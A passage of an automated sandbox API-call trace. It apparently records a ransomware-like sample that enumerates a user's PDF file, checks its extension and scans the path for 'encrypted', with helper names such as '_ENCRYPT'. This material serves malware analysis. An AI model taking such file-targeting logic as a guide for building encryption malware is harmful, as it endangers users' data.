Flags=0x0, Size=0x10) returned 0x88cef8 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=84, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa8) returned 0x7c5448 [0035.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=84, lpWideCharStr=0x7c5448, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf") returned 84 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.366] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.366] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0035.367] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.367] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.367] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.368] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.368] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.368] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.368] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.368] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.369] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.369] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.369] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.369] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.369] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.369] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.370] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0xd039be70, ftLastWriteTime.dwHighDateTime=0x1d5b7b0, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x0, dwReserved1=0x777648, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0x7c20c0 [0035.370] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.370] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.371] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x185fd7a0, ftCreationTime.dwHighDateTime=0x1d5b5b5, ftLastAccessTime.dwLowDateTime=0xd039be70, ftLastAccessTime.dwHighDateTime=0x1d5b7b0, ftLastWriteTime.dwLowDateTime=0xd039be70, ftLastWriteTime.dwHighDateTime=0x1d5b7b0, nFileSizeHigh=0x0, nFileSizeLow=0x14528, dwReserved0=0x0, dwReserved1=0x777648, cFileName="p_Vq.pdf", cAlternateFileName="")) returned 0x7c20c0 [0035.371] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.371] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.372] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\p_Vq.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.372] CompareStringW (Locale=0x400, 